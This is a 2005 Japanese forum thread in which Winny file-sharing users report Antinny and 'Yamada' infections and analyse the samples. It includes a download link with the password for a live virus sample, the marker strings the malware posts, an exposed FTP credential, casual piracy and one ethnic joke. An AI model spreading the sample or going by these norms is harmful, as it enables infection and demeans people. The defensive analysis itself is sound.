wwwwwwwwwwうはっwwwっうぇっうぇ

うぇwww
www
wwwっうぇうはっwww
wwwwww

っwwwうぇwwwうはっwwwwwwwwwwwwwww
65[名無し]さん(bin+cue).rar:2005/05/10(火) 16:41:03 ID:MMRpgRF+0
>>62
拡張子を表示させてないみたいだね。
自業自得だ。
66[名無し]さん(bin+cue).rar:2005/05/10(火) 16:49:43 ID:ZB6wXk/y0
拡張子を表示しない設定にしてる初心者がもっと増えますように・・・
67[名無し]さん(bin+cue).rar:2005/05/10(火) 20:43:33 ID:1J2nYwdb0
>>62
タスクトレイにペンだけかよ!w
68[名無し]さん(bin+cue).rar:2005/05/10(火) 21:45:12 ID:TrOqUY+t0
>>42
これマジいいね。
転ばぬ先に杖で皆入れといたほうがいいんじゃないの。
っていうか、次スレにはテンプレに入れておいてほしいくらい。
69[名無し]さん(bin+cue).rar:2005/05/10(火) 23:51:56 ID:nqo/zlp10
>>60
モザイク除去パッチ

(;´Д`)
70[名無し]さん(bin+cue).rar:2005/05/11(水) 02:30:46 ID:ZuYYsYIO0
山田のテストのためにFWルールを書いてみた
71[名無し]さん(bin+cue).rar:2005/05/11(水) 02:59:31 ID:rdb3G0Bx0
>>62
の娘に萌えたのは俺だけじゃないはず・・・
72[名無し]さん(bin+cue).rar:2005/05/11(水) 04:56:34 ID:zqRGRNU00
>>62
Tuenappとかうさくりーん、リソハカまで入ってるのに拡張子表示させてないって
73[名無し]さん(bin+cue).rar:2005/05/11(水) 08:53:10 ID:0hSewDM50
ファイル名に偽装の拡張子があったら、偽物と判るからイイんじゃね
感染してるようだが
74[名無し]さん(bin+cue).rar:2005/05/11(水) 10:04:54 ID:tUP14UEm0
・・・長いファイル名は、選択されてないと省略表示されるんだよ。
75[名無し]さん(bin+cue).rar:2005/05/11(水) 10:41:17 ID:T2cOoNFe0
>>68
釣りかは知らんが、>23に書いてある
最新版は1.9.6b2だけど
中の人もずっと更新しちゃいないようだ
期限が過ぎると使えんからな
76[名無し]さん(bin+cue).rar:2005/05/11(水) 12:21:00 ID:IhP2nfx40
最新版は1.9.6b2+だよ
77[名無し]さん(bin+cue).rar:2005/05/11(水) 12:21:47 ID:tgw2o5lQ0
http://203-67-155-197.adsl.dynamic.seed.net.tw/
っうぇwwwっwww
wwwwwwwwwっうぇおkwww
うはっwwwおkwwwっうぇっwっっっ
wwwwwwwwwwww

っっうはっwwwっうぇwww
78[名無し]さん(bin+cue).rar:2005/05/11(水) 12:25:27 ID:ToWE7rmF0
79[名無し]さん(bin+cue).rar:2005/05/11(水) 12:38:52 ID:pBUmuJUm0
動きが遅くなると、すぐタスクマネージャーを出して確認しているのは漏れだけではないはず。
80[名無し]さん(bin+cue).rar:2005/05/11(水) 12:53:31 ID:TdJaJ6KA0
81[名無し]さん(bin+cue).rar:2005/05/11(水) 13:35:41 ID:cfMUhsNg0
っていうかny経由のファイルを実行するときはタスクマネージャを監視する俺
82[名無し]さん(bin+cue).rar:2005/05/11(水) 14:47:54 ID:u6ooWT7Q0
WinnyFileDatabaseのこのHP。
 ttp://winny.serveftp.com/nydb/top.php
ぜんぜん応答かえってこないんだけど、うちだけ?
83[名無し]さん(bin+cue).rar:2005/05/11(水) 14:57:25 ID:/rRv3yWA0
>>82
普通にアクセスできるよ
84[名無し]さん(bin+cue).rar:2005/05/11(水) 15:08:55 ID:u6ooWT7Q0
>>83
ありがとぉ。

なんでだろ、全然表示できない。(´・ω・`)
85[名無し]さん(bin+cue).rar:2005/05/11(水) 15:23:23 ID:u6ooWT7Q0
串さしたら表示でけた。
でも、いちいちささないといけないのはめんどくさいなぁ。(´・ω・`)
86[名無し]さん(bin+cue).rar:2005/05/11(水) 15:30:09 ID:EoxW40US0
>>85
串ささなくてもみれるよ
87通報屋 ◆Y39/vakKjY :2005/05/11(水) 16:52:33 ID:Ue9if7aD0
>>82
安心汁。漏れもアクセス出来ないorz
串差してもだめぽorz
88[名無し]さん(bin+cue).rar:2005/05/11(水) 16:55:01 ID:gizvqGtd0
HPの運営者がホストごとに弾いてる気がする・・・
89[名無し]さん(bin+cue).rar:2005/05/11(水) 16:55:46 ID:gizvqGtd0
上げてしまった・・・
欝だ死のう
;y=ー(´Д`;)・∵. ターン...
90[名無し]さん(bin+cue).rar:2005/05/11(水) 16:58:35 ID:tUP14UEm0
>>82
見れない by dion
91[名無し]さん(bin+cue).rar:2005/05/11(水) 16:59:58 ID:zvgEOUGk0
>>82
見れない by yahoo
92[名無し]さん(bin+cue).rar:2005/05/11(水) 17:06:00 ID:gizvqGtd0
>>82
見れない by yahoo
見れる by point
93[名無し]さん(bin+cue).rar:2005/05/11(水) 17:22:37 ID:5VwmNoXB0
>>82
so-net見れますた。今となっては、たいして信頼性もないけどね
94[名無し]さん(bin+cue).rar:2005/05/11(水) 17:29:27 ID:WJav1Pre0
見れる by Excite
95[名無し]さん(bin+cue).rar:2005/05/11(水) 17:30:29 ID:gOsyK6Y00
>>82
見れる by ocn
96[名無し]さん(bin+cue).rar:2005/05/11(水) 18:10:41 ID:yEhhwm+00
>>82
yahooだけど見れるぞ
97[名無し]さん(bin+cue).rar:2005/05/11(水) 18:28:01 ID:0fjA9Aph0
ブラウザチェックとか?
98[名無し]さん(bin+cue).rar:2005/05/11(水) 18:35:26 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95453.jpg
99[名無し]さん(bin+cue).rar:2005/05/11(水) 18:37:07 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95460.jpg

ネタ臭いがなんだろね?
100[名無し]さん(bin+cue).rar:2005/05/11(水) 18:43:44 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95466.jpg
101[名無し]さん(bin+cue).rar:2005/05/11(水) 18:58:00 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95471.jpg
tp://www.uploda.org/file/uporg95477.jpg

なんかチャット相手が気づいたぽい。ネタじゃなかったのか((((;゚Д゚)))ガクガクブルブル
102[名無し]さん(bin+cue).rar:2005/05/11(水) 18:59:11 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95483.jpg

やっぱキンタマかw
103[名無し]さん(bin+cue).rar:2005/05/11(水) 19:02:04 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95487.jpg
tp://www.uploda.org/file/uporg95490.jpg

んでも実際どうなんだろ・・・判断しかねる
104[名無し]さん(bin+cue).rar:2005/05/11(水) 19:02:25 ID:/u2k2oZY0
>>98-102
苺みたいなやつ?
105[名無し]さん(bin+cue).rar:2005/05/11(水) 19:03:50 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95492.jpg

これってどこ?
106[名無し]さん(bin+cue).rar:2005/05/11(水) 19:05:31 ID:1E91I6lw0
tp://www.uploda.org/file/uporg95501.jpg

やっぱネタか?なんかvipperくせー('A`)
107[名無し]さん(bin+cue).rar:2005/05/11(水) 19:09:31 ID:1E91I6lw0
山田だったのか
最近すっかりどうでもよくなってたからなあ
108[名無し]さん(bin+cue).rar:2005/05/11(水) 19:11:06 ID:/u2k2oZY0
山田のSSをうpしたのか・・・。
109[名無し]さん(bin+cue).rar:2005/05/11(水) 20:18:26 ID:v6iIsjQr0
ID:1E91I6lw0
スレ違い
110[名無し]さん(bin+cue).rar:2005/05/11(水) 20:49:47 ID:1E91I6lw0
悪かったス(´・ω・)
もっと早く気づくべきだったス
111[名無し]さん(bin+cue).rar:2005/05/12(木) 01:30:12 ID:j9VLxS3F0
ちょっと思うんだけど、山田で作成されてるjpegってウイルス混入してないかい?
112[名無し]さん(bin+cue).rar:2005/05/12(木) 02:16:52 ID:3JjttEmi0
ウイルスのバイナリが混入してても
実行されないだろ、データなんだから。
113[名無し]さん(bin+cue).rar:2005/05/12(木) 02:28:40 ID:2ZVS9gBC0
【使用OS】 Win XP Pro SP2
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 オンラインスキャンのみ
【AntiVirusをUpdateしてるか】
【Winnyのバージョン】 Share A82での感染です
【Winny歴、総DL量】
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 したつもり

【症状、具体的に分かる限りすべて書く】
XPのファイヤーウォールが解除される。(その後FWを開始できない)
ホストファイルが書き換えられてWindowsUpdateやアンチウィルスソフト会社サイト
などへのアクセスが朝日コムに変えられてる
その他不明

【何をしたらそんなことになったのか】
[シングル] 坂本真綾 - ループ (2005.05.11)(samplCD VBR)(アニメ「ツバサ・クロニクル」ED曲).mp3.zip
(cb1c51f6cc6e7b7cd7c9e53e3d442486a3a4c176)
を解凍して出てきたフォルダ偽装EXEを踏んだ

※感染元のファイルの情報もあると良し
【これまでにとった措置】 ホストファイルの書き換え、オンラインスキャン(ウィルス発見できず)
タスクマネージャーやレジストリエディタで怪しそうなのをチェックするも見つからず。
SpyBotでも特になし

Shareからなのでスレ違いかもしれませんが情報をお持ちの方お願いします
114[名無し]さん(bin+cue).rar:2005/05/12(木) 04:23:14 ID:xQLiiWi+0
(同人誌)[月野定規]May.zip

この中にexeが入ってるみたいなんだけど、そのexeを直接踏まなくても
ウイルスが動作するみたいなんですよね。これ。
どういう仕組みなんでしょうか?一度見てみてください・・・
115[名無し]さん(bin+cue).rar:2005/05/12(木) 09:42:06 ID:OccaGsaw0
了解。
116[名無し]さん(bin+cue).rar:2005/05/12(木) 10:08:23 ID:EyXRR2Mz0
>>113
山田カワイソス
117[名無し]さん(bin+cue).rar:2005/05/12(木) 11:55:45 ID:+c+3A4H40
>>113
> XPのファイヤーウォールが解除される。(その後FWを開始できない)

これが恐いね。どんなエラーが出るの?
118[名無し]さん(bin+cue).rar:2005/05/12(木) 11:59:55 ID:4kyA1FS50
XPのFirewallなんてあって無いようなもんだが、OutpostやKerioなん
かのアプリまで落とされるとしたらやっかいだな。
119[名無し]さん(bin+cue).rar:2005/05/12(木) 15:42:30 ID:UFCwzMRQO
なをというか、どこからつっこんでいいやらという感じだが、とりあえずこれだけは
スレ違い、窓から
120[名無し]さん(bin+cue).rar:2005/05/12(木) 15:46:09 ID:cxTxNwrL0
携帯から乙
121[名無し]さん(bin+cue).rar:2005/05/12(木) 16:32:41 ID:m/wsXEx20
>>114
ハッシュも晒してくれ、入手したブツ
(同人誌) [月野定規] May.zip 8,733,252bytes
にはexeなんか混在してなかった。
122[名無し]さん(bin+cue).rar:2005/05/12(木) 16:48:48 ID:KzWEcZbD0
>>121
ごめん、怪しかったのでキャッシュ消しちゃった。
exe入りなのは間違いないですよ。
123[名無し]さん(bin+cue).rar:2005/05/12(木) 17:13:44 ID:afbI+AYu0
ここに↓2ch管理人訴えるっていう人がいるよw裁判おこすってさw
【経緯】
公務員がヤフオクで違法コピー販売の副業やってて、ウィルスに感染→個人情報他ダダ漏れ
→2ちゃんに晒されて→自分のしてた事も棚上げして逆ギレ→管理人訴える
http://pc7.2ch.net/test/read.cgi/yahoo/1115636340/
                             
124[名無し]さん(bin+cue).rar:2005/05/12(木) 18:53:09 ID:si7J2xCs0
訴えるわけがない
アホくさい
125[名無し]さん(bin+cue).rar:2005/05/12(木) 19:42:25 ID:+Q19eCiD0
【ハック?】2chにlivedoor秘書乙部Blogが埋め込まれている!
http://news19.2ch.net/test/read.cgi/news/1115885963/
126ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
127ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
128通報屋 ◆Y39/vakKjY :2005/05/12(木) 21:11:57 ID:mnX/6fWd0
>>126
詳しく解析中。これも検体に回す
>>127
ZIP解凍時の脆弱性をねらったタイプのウイルス。
(解凍するとそのパスに解凍されてしまう)
新種の予感・・・
129[名無し]さん(bin+cue).rar:2005/05/12(木) 21:12:29 ID:vOvqqp5c0
解凍ツール更新してないやつはイチコロだなー ナムナム
130[名無し]さん(bin+cue).rar:2005/05/12(木) 21:27:33 ID:0lapicMb0
2chのトップにアクセスすると127.0.0.1に飛ばされるんだけど…
131[名無し]さん(bin+cue).rar:2005/05/12(木) 21:34:54 ID:IBfMYA4H0
>>130
俺も飛ばされるwww

運営の山田スレでちょっと前に「どうやって感染者に気づかせるか」って
話してたから、板の設定をFOX★あたりがいじってるんじゃないかな?
132[名無し]さん(bin+cue).rar:2005/05/12(木) 21:37:38 ID:tpOozAHm0
>>131
違う

【乙部blog】iframeタグがスクリプトエラーを吐き出す問題について
http://qb5.2ch.net/test/read.cgi/operate/1115893714/

948 名前:動け動けウゴウゴ2ちゃんねる メェル:sage 投稿日:2005/05/12(木) 20:58:30 ID:QoR69F0Y0 BE:1625142-##
乙部ブログにある
<script type="text/javascript" language="JavaScript">w=window;if(w.parent != w.self) { w.parent.location = 'http://127.0.0.1/'; }</script><br />
が原因の模様
133131:2005/05/12(木) 21:41:44 ID:IBfMYA4H0
>>130
ちがってたごめん
134[名無し]さん(bin+cue).rar:2005/05/12(木) 21:47:20 ID:I95sLcS/0
382 :動け動けウゴウゴ2ちゃんねる :2005/05/12(木) 21:14:39 ID:3KpRKKkk0
馬鹿に分かるように説明

2ch運営ボランティアの誰かがライブドアブログを<iframe>タグを使い呼び出し、
アクセスランキングあげて遊ぼうと各板に
jp/ld_ayako/archives/21502770.html" width=1 height="1" scrolling=no frameborder=0 name=a01></iframe>
を仕込む。

アクセス数がおかしいのでライブドア側が気づく

ライブドア側が<ifame>でページが呼ばれたら http://127.0.0.1/ へ飛ばすように「ブログ側」に
Javaスクリプトをしこむ
<script type="text/javascript" language="JavaScript">w=window;if(w.parent != w.self) { w.parent.location = 'http://127.0.0.1/'; }</script>

★いまここ

ちぇっ飛ばされちゃーいろいろめんどいから悪戯もおわりか、
と2ch側が<iframe src="http://blog.livedoor.〜をはずす。

ひろゆき結婚会見。
135[名無し]さん(bin+cue).rar:2005/05/12(木) 21:49:09 ID:m/wsXEx20
だからタグ対策はしろ、っての>2ch運営
1chが、あれだけ荒らされてたのにねぇ…

>>127
daemon.exeが、名前の通りのブツ(DaemonTools)だとしたら…。何をするつもりなのかねぇ。
isoイメージとか、解凍したとたんに実行ってことか…2段構え?
136[名無し]さん(bin+cue).rar:2005/05/12(木) 22:23:01 ID:vNwdBzDp0
>>127
ノートン2004検出可能。
ウィルス名:Trojan Horse

137[名無し]さん(bin+cue).rar:2005/05/12(木) 22:23:28 ID:m/wsXEx20
>>126
[シングル] 坂本真綾 - ループ (2005.05.11)(ラジオ音源 128k)(アニメ「ツバサ・クロニクル」ED曲).mp3.lzh および
[シングル] 坂本真綾 - ループ (2005.05.11)(ラジオ音源 320k)(アニメ「ツバサ・クロニクル」ED曲).mp3.lzh から
容量の異なる2つのexe(408Kのjpegアイコン偽装と810Kのフォルダアイコン偽装)を検出。
先生いわく、どちらもW32.HLLW.Antinnyとのこと

でかいほうの内部を見てみると、ファイル名偽造コンバータとZIP化エンジン。
PCの内部ファイルを探すのかどうかは分からんが、ZIP化して、エロものとかの
名前を付けて放流するタイプらしい。小さいほうは、でかいのを再圧縮したものっぽい。

いずれにしても、その場合は検出済みなので……。しかしそろそろ、1年が経つのだなぁ、しみじみ。
138通報屋 ◆Y39/vakKjY :2005/05/12(木) 22:34:10 ID:mnX/6fWd0
>>126 ZIP内部調査結果補足
・UPnPでポート解放を行うようにしている
・XP FWの80を解放
・UserAgentを大量に所持(ランダムで使用?)
・Visual C++ 6.0
139通報屋 ◆Y39/vakKjY :2005/05/12(木) 22:34:56 ID:mnX/6fWd0
>>137
はっしゅ どこか たのむ
140ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
141[名無し]さん(bin+cue).rar:2005/05/13(金) 01:41:40 ID:+uKIRbgv0
なんか軍拡競争みたいになってきたね。
次はどんな凄いやつが来るのかワクワクしてきたぜ
142[名無し]さん(bin+cue).rar:2005/05/13(金) 02:18:06 ID:Zun+wdxJ0
winnyのバージョンチェック警告みたいの出てるんだけどこれってたしかウィルスだよね?
143113:2005/05/13(金) 02:29:02 ID:pgoQyxQE0
情報ありがとうございます

山田でしたか・・・
一応疑って色々調べたんですが127.0.0.1にアクセスできないので
山田じゃないと思ってました

なんとかXPの復元機能で大丈夫になったっぽいです
暫く様子見ようと思います

今後は踏まないように気をつけます
144142:2005/05/13(金) 02:31:41 ID:Zun+wdxJ0
ウィルスとはちょっと違うみたいだね。スレ汚しスマソ
145[名無し]さん(bin+cue).rar:2005/05/13(金) 05:53:07 ID:0K4JkryB0
欄検眼段のことで質問です。
テンプレに載ってる確認方法で確認してみたのですが、感染していませんでした。
しかし、msconfigでスタートアップを見てみると、確かにIMJPMIG.exeが登録されてます。
そのファイルがあるフォルダに行こうとしても表示されなくて、
隠しフォルダなどのチェックもはずしましたが問題のフォルダが出てきません。
この場合どうすればよいでしょうか?
146[名無し]さん(bin+cue).rar:2005/05/13(金) 06:02:31 ID:dej/IIQC0
>>145
スペルをよく見ろ
147[名無し]さん(bin+cue).rar:2005/05/13(金) 06:23:20 ID:uzmV/rAA0
IMJPMIG.exeなら無問題
Iとl、見間違えやすいが別物。
148ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
149[名無し]さん(bin+cue).rar:2005/05/13(金) 09:01:21 ID:tJ2CXUw10
↑avg freeでスキャンしても反応しないexeがありました。
150[名無し]さん(bin+cue).rar:2005/05/13(金) 10:19:10 ID:JUKyOVvq0
作者は、UPnPを勉強中なのかな?
151[名無し]さん(bin+cue).rar:2005/05/13(金) 12:33:24 ID:rryxb9Vt0
そうかもね。
152[名無し]さん(bin+cue).rar:2005/05/13(金) 16:08:20 ID:LjCxMdny0
UPnP乙
これでYahoo以外も見れるようになるの?
153[名無し]さん(bin+cue).rar:2005/05/13(金) 18:16:46 ID:d5E7wc1f0
ここで解析してもらいたいのですが、うpろだにウイルスUPするのはやばいですか?
コメント欄で警告してパス付ZIPでうpすれば問題ないですかね?
154[名無し]さん(bin+cue).rar:2005/05/13(金) 18:25:56 ID:Op7Qxpfy0
まぁ問題ないんじゃないカナ?
155ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
156[名無し]さん(bin+cue).rar:2005/05/13(金) 18:37:28 ID:d5E7wc1f0
ttp://okinawa.ave2.jp/cgi/free/source3/0119.zip
ですよろしくお願いします。
パス付ですので「23y0drx98d55」と入力してください。
157[名無し]さん(bin+cue).rar:2005/05/13(金) 20:21:54 ID:5vZlsIwW0
>>127
前も似たようなのがあったと思ったが、JBBSに書き込むタイプ( ;゚Д゚)
158通報屋 ◆Y39/vakKjY :2005/05/13(金) 20:51:50 ID:BFnmIc8/0
>>156氏 うpの検体
PEiDにて調べたところPacker搭載、
DETHNOTEPADという文字列がバイナリに見える。
(MEW 11 1.2 -> NorthFox/HCC)
UnPackしたところ、VisualBasic 5.0 or 6.0の模様。
これ以上は危険なので解析中断。
こんなもんでよかとですか?('A`)
159[名無し]さん(bin+cue).rar:2005/05/13(金) 21:28:41 ID:+qNi4oNe0
マイネットワークに aruaruneyo.dyndns.org  ftp://VIP:[email protected]/
っていう見慣れないフォルダがあったのですが何かウィルスに掛かってるのでしょうか・・・?
160[名無し]さん(bin+cue).rar:2005/05/13(金) 21:32:29 ID:tTnwtuVr0
あるあるwねーよw
161[名無し]さん(bin+cue).rar:2005/05/13(金) 22:09:44 ID:a7XKlmYl0
>>159
きみは、plala.or.jpなのか?
だとすると、FTPサーバが起動している可能性があるので処理するように・・・
162ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
163[名無し]さん(bin+cue).rar:2005/05/13(金) 22:22:45 ID:KeG0uodA0
【使用OS】 XP
【WindowsUpdateしてるか】 しています
【使用AntiVirusソフト】 マカフィー
【AntiVirusをUpdateしてるか】 しています
【Winnyのバージョン】 2.0b71
【Winny歴、総DL量】 2ヶ月、40G
【テンプレを読んだか】 読みました
【テンプレにある対策を実行したか】 していなかった

【症状、具体的に分かる限りすべて書く】
>>60さんとまったく同じ症状でドキュメント内のフォルダが全て消え、
(・ё・)xxxxx.jpeg(容量バラバラ、ギガ単位でHDDの容量を埋め尽くしてしまいました〉
に置きかえられて、起動する度に「プログラムが応答していません、
システムがビジー状態です」といったようなウィンドウが際限なく開かれる。

【何をしたらそんなことになったのか】 >>60さんとまったく同じファイルを踏みました・・・
【これまでにとった措置】
セーフモードで起動してjpegを消したりしているのですが、通常起動にするとウィンドウがまた現れ
jpegファイルが再度つくられてしまい、何をすべきかわかりません。

OSの再インストール以外の解決方法があれば教えてもらえないでしょうか・・・?
164[名無し]さん(bin+cue).rar:2005/05/13(金) 22:28:02 ID:NDnluaSu0
なんでそんな異常事態なのにOS再インスコを躊躇うのだろう
正常性バイアスって奴かね?
165[名無し]さん(bin+cue).rar:2005/05/13(金) 22:49:55 ID:sCuoVCst0
まえまえから疑問に思ってるんだが
なんで再インスコを嫌がるんだ?
一番簡単で安全なのに

手動でウィルス駆除するほうが難しいぞ
166[名無し]さん(bin+cue).rar:2005/05/13(金) 22:58:10 ID:DCsCNuUz0
HDDを1パーティションで使っているんだろう。
167[名無し]さん(bin+cue).rar:2005/05/13(金) 23:10:19 ID:rMRoCldW0
ここで報告してくれるのはありがたいんだが、問題のファイル落とそうとしても
全く引っ掛かってくれないことの方が多い。
ロダにうpってくれればすぐにでも通報できるのに・・・
168[名無し]さん(bin+cue).rar:2005/05/13(金) 23:13:19 ID:fvE24MpH0
2次被害者出るんでネノ
169[名無し]さん(bin+cue).rar:2005/05/13(金) 23:15:43 ID:rMRoCldW0
>>156
みたいにすればいいんじゃね?
パスを日本語にすれば完璧。
170163:2005/05/13(金) 23:20:54 ID:KeG0uodA0
1パーティションで使っています。
なのでバックアップをとらないといけないので、どうしても躊躇してしまいました。
ウイルススキャンで何もでなかったので実行しちゃったんですが、そんなに甘くないですね(´・ω・`)
一部重要ファイルもあったので、かなり動揺しているみたいです。

起動する度にでるウィンドウだけでもどうにかならないでしょうか・・・
DVD等に焼くソフトが起動すらできません。

171[名無し]さん(bin+cue).rar:2005/05/13(金) 23:24:19 ID:+qNi4oNe0
>>161
いえ、YahooBBです。確かにftp.uploda.netってフォルダが有りますが
どう処理したらいいのでしょうか・・・
何か勝手にUPされちゃってたのかな(;´д⊂ヽヒックヒック
172[名無し]さん(bin+cue).rar:2005/05/13(金) 23:24:54 ID:O1d82Y+P0
>>163
KNOPPIXでデータ救出してみるのは?
173[名無し]さん(bin+cue).rar:2005/05/13(金) 23:33:02 ID:GibLo/iX0
>>170
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
で何か胡散臭いエントリーがあったりしない?
174[名無し]さん(bin+cue).rar:2005/05/14(土) 00:21:14 ID:sWmCZXaz0
テンプレに
NGワード: ftp.uploda.net
追加しろw
175[名無し]さん(bin+cue).rar:2005/05/14(土) 00:22:18 ID:KGxIjfQT0
>>157
起動した瞬間に書き込んでIP晒しというやつでしょうか?
ROのIDとかを書き込んじゃグやつなのかな?
どこかにこれに関するまとめページなどあるのでしょうか?
176[名無し]さん(bin+cue).rar:2005/05/14(土) 00:41:22 ID:1SyYw5Pq0
【使用OS】XP SP2
【WindowsUpdateしてるか】してる
【使用AntiVirusソフト】ウィルスバスター2005、AVG
【AntiVirusをUpdateしてるか】してる
【Winnyのバージョン】2
【Winny歴、総DL量】1年
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】
問題発生後、一通り確認してみたけど、症状が一致しない
【症状、具体的に分かる限りすべて書く】現段階では特に異常が確認できない
【何をしたらそんなことになったのか】
ダウン条件のキーワードで勝手に引っかかってきたexeがダウンロードされたと同時に
G:\System Volume Information\_restore{F65FC044-AC8A-4CCF-B827-02DC5BBFCA3F}\RP92
(↑nyが置いてあるローカルディスク)に謎のexeが作られた。exeには自分では触ってない。
バスターはスルーしたが、AVGがAntinyが上記のフォルダにあるから
削除しなさいと言うダイアログが出た。
感染元ファイル名は失念したが、キーワードに引っかかりやすい様にやたら長いもの。
【これまでにとった措置】
ウィルスソフト削除。ウィルススキャン(バスター、ノートン、AVG)


クリックさえしなけりゃ安全と高をくくってました…
情報をお持ちの方、よろしくお願いします…
177163:2005/05/14(土) 00:59:05 ID:OjHRkhWB0
ProgramFiles内にある、いかにも怪しいフォルダ(フォルダ偽装したexe、*** .exe等)
を削除したら問題解決したかも・・・です。
フォルダ名がエロゲタイトルでだったので気付かなかったとです
内部も通常エロゲ道理のフォルダ分けがされてましたが、こんなに手のこんだウイルスがあるなんて驚きですわー・・・
もうexeは踏まない事にします、>>172>>173さん、ありがとうございました。
178[名無し]さん(bin+cue).rar:2005/05/14(土) 02:11:32 ID:Ea2eKtrM0
いきなりpcの電源が落ちるのは故障?それともウイルスですか?
179[名無し]さん(bin+cue).rar:2005/05/14(土) 02:15:14 ID:6QLxhh+80
寿命
180[名無し]さん(bin+cue).rar:2005/05/14(土) 02:16:32 ID:wzAl7J600
>>178
日頃の行い
181[名無し]さん(bin+cue).rar:2005/05/14(土) 02:24:44 ID:29+HuDKj0
そりゃ家の電源不足だべ
182178:2005/05/14(土) 02:56:28 ID:Ea2eKtrM0
pcが落ちるっていうか、モニタの電源が切れて、
でも本体の電源ボタンは緑に光ってて、
強制終了しようとしてもできなくて、
仕方が無いからコンセント抜いて、って感じです。
183[名無し]さん(bin+cue).rar:2005/05/14(土) 02:59:29 ID:FIgrFpit0
ウィルス関係ないな
184178:2005/05/14(土) 03:02:12 ID:Ea2eKtrM0
一応
【使用OS】XP 
【WindowsUpdateしてるか】してる
【使用AntiVirusソフト】ノートン  (2002・・・)
【AntiVirusをUpdateしてるか】してない
【Winnyのバージョン】2
【Winny歴、総DL量】1年半くらい?
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】
【何をしたらそんなことになったのか】?
185[名無し]さん(bin+cue).rar:2005/05/14(土) 03:07:33 ID:ESx/peB60
>>182
それはウィルスがどうのというソフト側ではなくハード側の問題じゃないかなぁ。
186[名無し]さん(bin+cue).rar:2005/05/14(土) 03:08:24 ID:+22IGnrb0
>>178
先日、俺のPCが同じような事になった。
PC本体のファンは回っているし、モニタのデバイス入れ直してみたり、
OS再セットアップもやったが、何度やっても、しばらくするとモニタの電源が
不意に落ちる。そのうち起動時に落ちるようになった。でも領域操作して
起動時にchkdsk入るようにすると、問題なく起動したり。
結局、マザーのコンデンサが6個くらい膨らんでた。
187[名無し]さん(bin+cue).rar:2005/05/14(土) 03:10:58 ID:+22IGnrb0
>>186
モニタの電源落ちるってのはちょっと違った。
本体からの信号が通らないって感じ。代替モニタがないから、モニタが
悪いのかも、とか断線とか疑ってた。
188[名無し]さん(bin+cue).rar:2005/05/14(土) 03:48:53 ID:8JEoKHKf0
>>187
スレ違いだから
189[名無し]さん(bin+cue).rar:2005/05/14(土) 04:40:16 ID:Itz6OvzI0
航行中の豪華客船が氷山に激突して沈没することになった。
乗り合わせていた韓国人の青年が、真っ先に救命ボートに乗ろうとした。
これを見た英国人紳士が韓国人青年に言った。
「これこれ、まだご婦人方がいるではないか」
これを聞いた韓国人青年は言った。
「そんなことやってる場合じゃないだろ?」
190[名無し]さん(bin+cue).rar:2005/05/14(土) 04:46:23 ID:93OtSIh+0
通報屋さんに質問(´・ω・)ノシ

山田ウイルス関連で通報した検体で、名前欄-メール欄に以下のものを
入れる「以外」のものがありました? また以下のもので送ってないものは?

名前欄入力          メール欄
erofusianasan/        hage
fusianasan            age
http://fusianasan/~ss.jpg  sage
murofusianasan/       zage
(なし)              sage

山田は圧縮なしなのでエディタに入れてサーチすればすぐ出てきます。
元祖(youjo.exe)が(なし)sage、(lolita.exe)がerofusianasan-hage、
あと手元にfusianasan-ageがありますが、通報状況がどうなっているのか
知りたいのです。本当は検体ほしい。
191178:2005/05/14(土) 09:17:33 ID:gGL50/V80
ゆうべの書き込みのあとも落ちた・・・

>>187どーもありがとうございます
>>188スレ違いわりーわりー
192[名無し]さん(bin+cue).rar:2005/05/14(土) 12:12:50 ID:Mjbn9GOG0
ニュイルスってなんですか?
193通報屋 ◆Y39/vakKjY :2005/05/14(土) 12:27:15 ID:VLPSi+mB0
>>190
fusianasan            age
murofusianasan/       zage
このへん通報したのか定かではない(手元に残ってないというか、見れん)
それ以外は確認。fusianasan-ageは手元にあるかなぁ・・・・役立たずでごめんorz
超特急で確認したから漏れとかありそう_| ̄|
194[名無し]さん(bin+cue).rar:2005/05/14(土) 12:28:57 ID:MP4S8/ch0
>>192
ニューウィルス
195チラシの裏:2005/05/14(土) 12:47:05 ID:sfw0s/aF0
PC買って10年近く、今までフリーアンチウイルス使ってたけど、まんまとウイルスにやられた
ノートン先生買ってこようと思った土曜の午後
196[名無し]さん(bin+cue).rar:2005/05/14(土) 12:57:21 ID:ZfQxo9NN0
きちんと運用してるなら、商用もフリーもあんまり関係ない悪寒。
俺はコムガード(ハードウェアレベルでリカバリー)とフリーワクチンを
組み合わせてる。
197[名無し]さん(bin+cue).rar:2005/05/14(土) 13:54:58 ID:sWmCZXaz0
>194
new winny virus
198[名無し]さん(bin+cue).rar:2005/05/14(土) 15:40:05 ID:GRIaTivw0
Winny  ウイルスを貼って行くスレ
http://pc7.2ch.net/test/read.cgi/pc2nanmin/1101339955/
199[名無し]さん(bin+cue).rar:2005/05/14(土) 16:08:02 ID:Ya3aqyh30
winnyでフォルダ情報→フォルダ削除を押すと、勝手にwinnyのフォルダに
